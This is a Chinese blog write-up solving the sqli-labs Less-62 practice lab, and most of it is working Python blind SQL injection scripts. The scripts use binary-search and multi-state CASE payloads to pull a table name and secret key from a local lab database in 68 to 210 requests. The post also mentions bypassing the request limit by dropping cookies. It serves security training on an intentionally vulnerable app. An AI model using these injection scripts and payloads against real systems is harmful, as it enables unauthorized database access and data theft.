<!DOCTYPE html>
<html lang="zh">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="renderer" content="webkit">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
    <title>
        Ovie博客
    </title>
    
<link rel="stylesheet" href="/libs/highlight/styles/monokai-sublime.css">

    
<link rel="stylesheet" href="/libs/font-awesome/css/font-awesome.min.css">

    
<link rel="stylesheet" href="/css/style.css">

<meta name="generator" content="Hexo 4.2.1"></head>

<body id="bodyx">
    <div class="hd posts">
    <a href="/index.html"><i class="fa fa-reply replay-btn" aria-hidden="true"></i></a>
    <div class="post-title">
        <p>
            sqli-labs靶场Less-62题解（少于130次）
        </p>
        <hr>
    </div>
    <div class="post-content">
        <p><a href="https://github.com/Audi-1/sqli-labs" target="_blank" rel="noopener">sqli-labs</a>靶场Less-62题目，是通过布尔注入获取一段secret key，该key存于<code>challenges</code>数据库的某个随机表名的表内。要求在请求次数不超过130次的情况下获取该key。</p>
<h2 id="靶场搭建"><a href="#靶场搭建" class="headerlink" title="靶场搭建"></a>靶场搭建</h2><p>直接用docker搭建：<code>sudo docker run -dt --name sqli-lab -p 80:80 acgpiano/sqli-labs:latest</code></p>
<h2 id="二分法"><a href="#二分法" class="headerlink" title="二分法"></a>二分法</h2><p>该注入点是<code>id</code>参数，SQL语句上下文是<code>SELECT * FROM security.users WHERE id=(&#39;$id&#39;) LIMIT 0,1</code>，注入时用<code>&#39;)</code>闭合。一般思路是先获取存key的表的表名，再获取key所在的列的列名，再获取key。表名有10个字符，由大写字母和数字构成；列名为<code>secret_4个字符</code>，这4个字符由大写字母和数字构成；secret key为24个字符，由大小写字母和数字构成。</p>
<p>下面的脚本采用二分法比较ASCII码来获取数据，请求次数在210次左右。而题目要求是130次内，不过请求不带Cookie可绕过了这个限制。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/python3</span></span><br><span class="line"><span class="comment"># -*-coding:utf-8-*-</span></span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> string</span><br><span class="line"></span><br><span class="line"><span class="string">"""</span></span><br><span class="line"><span class="string">表名：10个字符。有大写字母和数字构成</span></span><br><span class="line"><span class="string">列名：secret_接4个字符，这4个字符由大写字母和数字构成</span></span><br><span class="line"><span class="string">secret：24个字符，由大小写字母和数字构成</span></span><br><span class="line"><span class="string">"""</span></span><br><span class="line"></span><br><span class="line">un_chars = string.digits + string.ascii_uppercase  <span class="comment"># 按ASCII码从小到大排序</span></span><br><span class="line">uln_chars = string.digits + string.ascii_uppercase + string.ascii_lowercase  <span class="comment"># 按ASCII码从小到大排序</span></span><br><span class="line">url = <span class="string">"http://192.168.197.133/Less-62/index.php"</span>  <span class="comment"># 改成你的地址</span></span><br><span class="line">try_count = <span class="number">0</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">extract_data</span><span class="params">(tmpl_payload, length, chars)</span>:</span></span><br><span class="line">    <span class="keyword">global</span> try_count</span><br><span class="line">    result = <span class="string">""</span></span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">1</span>, length + <span class="number">1</span>):</span><br><span class="line">        left, right = <span class="number">0</span>, len(chars) - <span class="number">1</span></span><br><span class="line">        <span class="keyword">while</span> left &lt; right:</span><br><span class="line">            m = (left + right) // <span class="number">2</span>  <span class="comment"># 左中位数</span></span><br><span class="line">            payload = tmpl_payload % (i, ord(chars[m]))</span><br><span class="line">            resp = requests.get(url, params=&#123;<span class="string">"id"</span>: payload&#125;)</span><br><span class="line">            try_count += <span class="number">1</span>  <span class="comment"># 统计请求个数</span></span><br><span class="line">            <span class="keyword">if</span> <span class="string">"Your Login name"</span> <span class="keyword">in</span> resp.text:</span><br><span class="line">                left = m + <span class="number">1</span></span><br><span class="line">            <span class="keyword">else</span>:</span><br><span class="line">                right = m</span><br><span class="line">        result += chars[left]</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> result</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">table_name = extract_data(</span><br><span class="line">    <span class="string">"1') and ascii(substr((select table_name from information_schema.TABLES where TABLE_SCHEMA='challenges'),%s,1))&gt;%d#"</span>,</span><br><span class="line">    <span class="number">10</span>, un_chars</span><br><span class="line">)</span><br><span class="line">print(<span class="string">"table_name:"</span>, table_name)</span><br><span class="line"></span><br><span class="line">column_name = <span class="string">"secret_"</span> + extract_data(</span><br><span class="line">    <span class="string">"1') and ascii(substr(substr((select column_name from information_schema.columns where TABLE_name='"</span> + table_name + <span class="string">"' limit 2,1),8,4),%s,1))&gt;%d#"</span>,</span><br><span class="line">    <span class="number">4</span>, un_chars</span><br><span class="line">)</span><br><span class="line">print(<span class="string">"column_name:"</span>, column_name)</span><br><span class="line"></span><br><span class="line">secret_key = extract_data(</span><br><span class="line">    <span class="string">"1') and ascii(substr((select "</span> + column_name + <span class="string">" from "</span> + table_name+<span class="string">"),%s,1))&gt;%d#"</span>,</span><br><span class="line">    <span class="number">24</span>, uln_chars</span><br><span class="line">)</span><br><span class="line">print(<span class="string">"secret_key:"</span>, secret_key)</span><br><span class="line"></span><br><span class="line">print(<span class="string">"Done. try_count:"</span>, try_count)</span><br></pre></td></tr></table></figure>



<h2 id="利用多状态"><a href="#利用多状态" class="headerlink" title="利用多状态"></a>利用多状态</h2><p>虽说上面可以绕过尝试次数限制，那如果就要尝试次数在130次内呢。</p>
<p>上面的二分法通过判断响应里是否有查询结果来判断注入的SQL语句为True或False，响应里有两种状态：有查询结果和无查询结果。其实响应里存在多个状态，id为1时返回的<code>Login name</code>为<code>Angelina</code>，为<code>2</code>时返回的是<code>Dummy</code>，还有为3，为4，为5等。假如我们要判断数据库里一个字符中的N个比特是什么，我们需要2的N次方个状态，如：我们要判断某串字符串第<code>i</code>个字符的第<code>j</code>位开始的三个比特是否为：000，001，010，011，100，101，110或111，写成SQL语句就是：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">SELECT CASE ASCII(SUBSTRING((&#123;query&#125;), &#123;i&#125;, 1)) &amp; (2**j + 2**(j+1) + 2**(j+2))</span><br><span class="line">    WHEN 0 THEN 1</span><br><span class="line">    WHEN 2**j THEN 2</span><br><span class="line">    WHEN 2**(j+1) THEN 3</span><br><span class="line">    WHEN 2**(j+1) + 2**j THEN 4</span><br><span class="line">    WHEN 2**(j+2) THEN 5</span><br><span class="line">    WHEN 2**(j+2) + 2**j THEN 6</span><br><span class="line">    WHEN 2**(j+2) + 2**(j+1) THEN 7</span><br><span class="line">    ELSE 8</span><br><span class="line">END</span><br></pre></td></tr></table></figure>
<p>因为users表里的数据有13条，也就是13个状态，大于8，小于16，所以每次请求通过比较8个状态获取3个比特的数据。</p>
<blockquote>
<p>一个小问题：为什么id为1时，返回的name是<code>Angelina</code>？而数据库里id为1的name是<code>Dumb</code>？</p>
<p>因为响应中返回的name是从硬编码在PHP代码里的数组里通过下标获取的，看代码：<a href="https://github.com/Audi-1/sqli-labs/blob/886b0dcc733c1a36caf10cfba076397b9e09ce7f/Less-62/index.php#L104" target="_blank" rel="noopener">https://github.com/Audi-1/sqli-labs/blob/886b0dcc733c1a36caf10cfba076397b9e09ce7f/Less-62/index.php#L104</a></p>
</blockquote>
<p>通过上面的思路，编写脚本如下。请求次数减少到114次。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/python3</span></span><br><span class="line"><span class="comment"># -*-coding:utf-8-*-</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> re</span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">url = <span class="string">"http://192.168.197.133/Less-62/index.php"</span>  <span class="comment"># 改成你的地址</span></span><br><span class="line">try_count = <span class="number">0</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">extract_bits</span><span class="params">(query, i, j)</span>:</span></span><br><span class="line">    <span class="string">"""</span></span><br><span class="line"><span class="string">    获取query执行结果的第 i 个（从1开始算）字符的第 j 位开始的 3 个比特</span></span><br><span class="line"><span class="string">    """</span></span><br><span class="line">    <span class="keyword">global</span> try_count</span><br><span class="line"></span><br><span class="line">    payload = <span class="string">"""</span></span><br><span class="line"><span class="string">    '+(</span></span><br><span class="line"><span class="string">SELECT CASE ASCII(SUBSTRING((&#123;query&#125;), &#123;i&#125;, 1)) &amp; (&#123;bit_mark&#125;)</span></span><br><span class="line"><span class="string">    WHEN &#123;0&#125; THEN 1</span></span><br><span class="line"><span class="string">    WHEN &#123;1&#125; THEN 2</span></span><br><span class="line"><span class="string">    WHEN &#123;2&#125; THEN 3</span></span><br><span class="line"><span class="string">    WHEN &#123;3&#125; THEN 4</span></span><br><span class="line"><span class="string">    WHEN &#123;4&#125; THEN 5</span></span><br><span class="line"><span class="string">    WHEN &#123;5&#125; THEN 6</span></span><br><span class="line"><span class="string">    WHEN &#123;6&#125; THEN 7</span></span><br><span class="line"><span class="string">    ELSE 8</span></span><br><span class="line"><span class="string">END</span></span><br><span class="line"><span class="string">)+'</span></span><br><span class="line"><span class="string">    """</span>.format(<span class="number">0</span>, <span class="number">2</span>**j, <span class="number">2</span>**(j+<span class="number">1</span>), <span class="number">2</span>**(j+<span class="number">1</span>) + <span class="number">2</span>**j, <span class="number">2</span>**(j+<span class="number">2</span>), <span class="number">2</span>**(j+<span class="number">2</span>) + <span class="number">2</span>**j, <span class="number">2</span>**(j+<span class="number">2</span>) + <span class="number">2</span>**(j+<span class="number">1</span>), query=query, bit_mark=<span class="number">2</span>**j + <span class="number">2</span>**(j+<span class="number">1</span>) + <span class="number">2</span>**(j+<span class="number">2</span>), i=i)</span><br><span class="line">    payload = re.sub(<span class="string">r'\s+'</span>, <span class="string">' '</span>, payload.strip().replace(<span class="string">"\n"</span>, <span class="string">" "</span>))</span><br><span class="line">    <span class="comment"># print(payload)</span></span><br><span class="line"></span><br><span class="line">    resp = requests.get(url, params=&#123;<span class="string">"id"</span>: payload&#125;)</span><br><span class="line">    try_count += <span class="number">1</span></span><br><span class="line"></span><br><span class="line">    info = &#123;</span><br><span class="line">        <span class="string">"Angelina"</span>: <span class="string">"000"</span>,</span><br><span class="line">        <span class="string">"Dummy"</span>: <span class="string">"001"</span>,</span><br><span class="line">        <span class="string">"secure"</span>: <span class="string">"010"</span>,</span><br><span class="line">        <span class="string">"stupid"</span>: <span class="string">"011"</span>,</span><br><span class="line">        <span class="string">"superman"</span>: <span class="string">"100"</span>,</span><br><span class="line">        <span class="string">"batman"</span>: <span class="string">"101"</span>,</span><br><span class="line">        <span class="string">"admin"</span>: <span class="string">"110"</span>,</span><br><span class="line">        <span class="string">"admin1"</span>: <span class="string">"111"</span></span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    match = re.search(<span class="string">r"Your Login name : (.*?)&lt;br&gt;"</span>, resp.text)</span><br><span class="line">    <span class="keyword">assert</span> match</span><br><span class="line">    bits = info.get(match.group(<span class="number">1</span>))</span><br><span class="line">    <span class="keyword">assert</span> bits</span><br><span class="line">    <span class="keyword">return</span> bits</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">extract_data</span><span class="params">(query, length)</span>:</span></span><br><span class="line">    res = <span class="string">""</span></span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">1</span>, length+<span class="number">1</span>):</span><br><span class="line">        b3 = extract_bits(query, i, <span class="number">0</span>)  <span class="comment"># 00000111</span></span><br><span class="line">        b2 = extract_bits(query, i, <span class="number">3</span>)  <span class="comment"># 00111000</span></span><br><span class="line">        b1 = extract_bits(query, i, <span class="number">5</span>)  <span class="comment"># 11100000</span></span><br><span class="line">        bit = b1[:<span class="number">2</span>] + b2 + b3</span><br><span class="line">        res += chr(int(bit, <span class="number">2</span>))</span><br><span class="line">    <span class="keyword">return</span> res</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">"__main__"</span>:</span><br><span class="line">    table_name = extract_data(<span class="string">"select table_name from information_schema.TABLES where TABLE_SCHEMA='challenges' limit 1"</span>, <span class="number">10</span>)</span><br><span class="line">    print(<span class="string">"table_name:"</span>, table_name)</span><br><span class="line"></span><br><span class="line">    column_name = <span class="string">"secret_"</span> + extract_data(</span><br><span class="line">        <span class="string">"substr((select column_name from information_schema.columns where TABLE_name='"</span> + table_name + <span class="string">"' limit 2,1),8,4)"</span>,</span><br><span class="line">        <span class="number">4</span></span><br><span class="line">    )</span><br><span class="line">    print(<span class="string">"column_name:"</span>, column_name)</span><br><span class="line"></span><br><span class="line">    secret_key = extract_data(<span class="string">"select "</span> + column_name + <span class="string">" from challenges."</span> + table_name, <span class="number">24</span>)</span><br><span class="line">    print(<span class="string">"secret_key:"</span>, secret_key)</span><br><span class="line"></span><br><span class="line">    print(<span class="string">"Done. try_count:"</span>, try_count)</span><br></pre></td></tr></table></figure>



<h2 id="再减少点次数"><a href="#再减少点次数" class="headerlink" title="再减少点次数"></a>再减少点次数</h2><p>上面通过获取表名，再列名，再key。其实也可以不获取列名，只要知道表里有多少列，key所在的列在第几列即可，少点尝试次数。将上面main块的代码改成：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> __name__ == <span class="string">"__main__"</span>:</span><br><span class="line">    table_name = extract_data(<span class="string">"select table_name from information_schema.TABLES where TABLE_SCHEMA='challenges' limit 1"</span>, <span class="number">10</span>)</span><br><span class="line">    print(<span class="string">"table_name:"</span>, table_name)</span><br><span class="line"></span><br><span class="line">    secret_key = extract_data(<span class="string">"select c from (select 1 as a, 2 as b, 3 as c, 4 as d union select * from challenges.%s limit 1,1)x"</span> % table_name, <span class="number">24</span>)   <span class="comment"># 主要改的是这一句</span></span><br><span class="line">    print(<span class="string">"secret_key:"</span>, secret_key)</span><br><span class="line"></span><br><span class="line">    print(<span class="string">"Done. try_count:"</span>, try_count)</span><br></pre></td></tr></table></figure>

<p>请求次数是102次。</p>
<h2 id="再减少些次数"><a href="#再减少些次数" class="headerlink" title="再减少些次数"></a>再减少些次数</h2><p>一般MySQL的表名是区分大小写的，而在字符串比较的时候是不区分大小写的。进到docker容器里（<code>sudo docker exec -it sqli-lab mysql</code>）执行下面SQL语句测试下：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">use security</span><br><span class="line"></span><br><span class="line">SELECT * FROM users;  # 返回了数据</span><br><span class="line">SELECT * FROM userS;  # 报错，表名不存在</span><br><span class="line">SELECT * FROM users WHERE username&#x3D;&#39;admin&#39;;  # 返回admin</span><br><span class="line">SELECT * FROM users WHERE username&#x3D;&#39;ADMIn&#39;;  # 还是可以返回admin</span><br></pre></td></tr></table></figure>

<p>再看sqli-labs比较key是否正确的SQL语句（代码<a href="https://github.com/Audi-1/sqli-labs/blob/886b0dcc733c1a36caf10cfba076397b9e09ce7f/Less-62/index.php#L152" target="_blank" rel="noopener">在这</a>）：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">SELECT 1 FROM $table WHERE $col1&#x3D; &#39;$key&#39;;</span><br></pre></td></tr></table></figure>

<p>所以在获取key时，可以不管字母的大小写。而对于表名，它的构成是大写字母和数字，也用不着理会它的大小写。</p>
<p>再看数字、大写字母、小写字母的ASCII码的二进制格式：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">数字： 0011xxxx</span><br><span class="line">大写： 010xxxxx</span><br><span class="line">小写： 011xxxxx</span><br></pre></td></tr></table></figure>

<p>在获取表名或key时，我们判断第7位（比特）是不是1就知道该字符是数字或字母；而第6位不用管，因为对于数字，该位为1，对于字母，我们不用管字母的大小写也就不用管该位是0还是1。所以对于每个字符，我们只需获取第7位和前5位即可。</p>
<p>编写脚本如下：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/python3</span></span><br><span class="line"><span class="comment"># -*-coding:utf-8-*-</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> re</span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">url = <span class="string">"http://192.168.197.133/Less-62/index.php"</span>  <span class="comment"># 改成你的地址</span></span><br><span class="line">try_count = <span class="number">0</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">extract_bits</span><span class="params">(query, i, bit_values: list)</span>:</span></span><br><span class="line">    <span class="string">"""</span></span><br><span class="line"><span class="string">    获取query执行结果的第 i 个（从1开始算）字符的3个比特</span></span><br><span class="line"><span class="string">    哪3个比特由bit_values指定</span></span><br><span class="line"><span class="string">    """</span></span><br><span class="line">    <span class="keyword">global</span> try_count</span><br><span class="line"></span><br><span class="line">    <span class="keyword">assert</span> len(bit_values) == <span class="number">8</span></span><br><span class="line">    bit_marks = <span class="number">0</span></span><br><span class="line">    <span class="keyword">for</span> v <span class="keyword">in</span> bit_values:</span><br><span class="line">        bit_marks |= v</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    payload = <span class="string">"""</span></span><br><span class="line"><span class="string">    '+(</span></span><br><span class="line"><span class="string">SELECT CASE ASCII(SUBSTRING((&#123;query&#125;), &#123;i&#125;, 1)) &amp; (&#123;bit_mark&#125;)</span></span><br><span class="line"><span class="string">    WHEN &#123;0&#125; THEN 1</span></span><br><span class="line"><span class="string">    WHEN &#123;1&#125; THEN 2</span></span><br><span class="line"><span class="string">    WHEN &#123;2&#125; THEN 3</span></span><br><span class="line"><span class="string">    WHEN &#123;3&#125; THEN 4</span></span><br><span class="line"><span class="string">    WHEN &#123;4&#125; THEN 5</span></span><br><span class="line"><span class="string">    WHEN &#123;5&#125; THEN 6</span></span><br><span class="line"><span class="string">    WHEN &#123;6&#125; THEN 7</span></span><br><span class="line"><span class="string">    ELSE 8</span></span><br><span class="line"><span class="string">END</span></span><br><span class="line"><span class="string">)+'</span></span><br><span class="line"><span class="string">    """</span>.format(*bit_values[:<span class="number">7</span>], query=query, bit_mark=bit_marks, i=i)</span><br><span class="line">    payload = re.sub(<span class="string">r'\s+'</span>, <span class="string">' '</span>, payload.strip().replace(<span class="string">"\n"</span>, <span class="string">" "</span>))</span><br><span class="line">    <span class="comment"># print(payload)</span></span><br><span class="line"></span><br><span class="line">    resp = requests.get(url, params=&#123;<span class="string">"id"</span>: payload&#125;)</span><br><span class="line">    try_count += <span class="number">1</span></span><br><span class="line"></span><br><span class="line">    infos = [<span class="string">"Angelina"</span>, <span class="string">"Dummy"</span>, <span class="string">"secure"</span>, <span class="string">"stupid"</span>, <span class="string">"superman"</span>, <span class="string">"batman"</span>, <span class="string">"admin"</span>, <span class="string">"admin1"</span>]</span><br><span class="line"></span><br><span class="line">    match = re.search(<span class="string">r"Your Login name : (.*?)&lt;br&gt;"</span>, resp.text)</span><br><span class="line">    <span class="keyword">assert</span> match</span><br><span class="line">    <span class="keyword">assert</span> match.group(<span class="number">1</span>) <span class="keyword">in</span> infos</span><br><span class="line">    bits = bit_values[infos.index(match.group(<span class="number">1</span>))]</span><br><span class="line">    <span class="keyword">return</span> bits</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">extract_data</span><span class="params">(query, length)</span>:</span></span><br><span class="line">    <span class="string">"""</span></span><br><span class="line"><span class="string">    获取query查询结果的length个字符，每个字符只获取其第7位和前5位</span></span><br><span class="line"><span class="string">    """</span></span><br><span class="line">    res = <span class="string">""</span></span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">1</span>, length+<span class="number">1</span>):</span><br><span class="line">        b2 = extract_bits(query, i, [<span class="number">0b00000000</span>, <span class="number">0b00000001</span>, <span class="number">0b00000010</span>, <span class="number">0b00000011</span>, <span class="number">0b00000100</span>, <span class="number">0b00000101</span>, <span class="number">0b00000110</span>, <span class="number">0b00000111</span>])  <span class="comment"># 00000111</span></span><br><span class="line">        b1 = extract_bits(query, i, [<span class="number">0b00000000</span>, <span class="number">0b00001000</span>, <span class="number">0b00010000</span>, <span class="number">0b00011000</span>, <span class="number">0b01000000</span>, <span class="number">0b01001000</span>, <span class="number">0b01010000</span>, <span class="number">0b01011000</span>])  <span class="comment"># 01011000</span></span><br><span class="line">        <span class="keyword">if</span> b1 &amp; <span class="number">0b01000000</span> == <span class="number">0</span>:</span><br><span class="line">            <span class="comment"># 该字符为数字</span></span><br><span class="line">            bit = b1 | b2 | <span class="number">0b00100000</span></span><br><span class="line">        <span class="keyword">else</span>:</span><br><span class="line">            <span class="comment"># 该字符为字母</span></span><br><span class="line">            bit = b1 | b2</span><br><span class="line">        res += chr(bit)</span><br><span class="line">    <span class="keyword">return</span> res</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">"__main__"</span>:</span><br><span class="line">    table_name = extract_data(<span class="string">"select table_name from information_schema.TABLES where TABLE_SCHEMA='challenges' limit 1"</span>, <span class="number">10</span>)</span><br><span class="line">    print(<span class="string">"table_name:"</span>, table_name)</span><br><span class="line"></span><br><span class="line">    secret_key = extract_data(<span class="string">"select c from (select 1 as a, 2 as b, 3 as c, 4 as d union select * from challenges.%s limit 1,1)x"</span> % table_name, <span class="number">24</span>)</span><br><span class="line">    print(<span class="string">"secret_key:"</span>, secret_key)</span><br><span class="line"></span><br><span class="line">    print(<span class="string">"Done. try_count:"</span>, try_count)</span><br></pre></td></tr></table></figure>

<p>请求次数是68次。</p>

    </div>
    
</div>
    <div class="footer" id="footer">
    <p>Copyright © 2020 <a class="flink" href="https://hexo.io" target="_blank" rel="noopener">Hexo</a>-<a class="flink" href="https://github.com/sanjinhub/hexo-theme-geek" target="_blank" rel="noopener">Geek</a>.
        <label class="el-switch el-switch-green el-switch-sm" style="vertical-align: sub;">
            <input type="checkbox" name="switch" id="update_style">
            <span class="el-switch-style"></span>
        </label>
<!--         <script type="text/javascript">
        var cnzz_protocol = (("https:" == document.location.protocol) ? "https://" : "http://");
        document.write(unescape("%3Cspan id='cnzz_stat_icon_1278548644'%3E%3C/span%3E%3Cscript src='" + cnzz_protocol + "v1.cnzz.com/stat.php%3Fid%3D1278548644%26show%3Dpic1' type='text/javascript'%3E%3C/script%3E"));
        </script> -->
    </p>
</div>
<input type="hidden" id="web_style" value="black">
<input type="hidden" id="valine_appid" value="CmCti21ooOOIzFOhEyFkFvR0-gzGzoHsz">
<input type="hidden" id="valine_appKey" value="FqiyUqbg7McKN2eG0MCewupf">

<script src="/libs/jquery.min.js"></script>


<script src="/libs/highlight/highlight.pack.js"></script>

<script src='//cdn.jsdelivr.net/npm/valine@1.3.10/dist/Valine.min.js'></script>

<script src="/js/js.js"></script>

<style type="text/css">
.v * {
    color: #698fca;
}

.v .vlist .vcard .vhead .vsys {
    color: #3a3e4a;
}

.v .vlist .vcard .vh .vmeta .vat {
    color: #638fd5;
}

.v .vlist .vcard .vhead .vnick {
    color: #6ba1ff;
}

.v a {
    color: #8696b1;
}

.v .vlist .vcard .vhead .vnick:hover {
    color: #669bfc;
}
</style>
</body>

</html>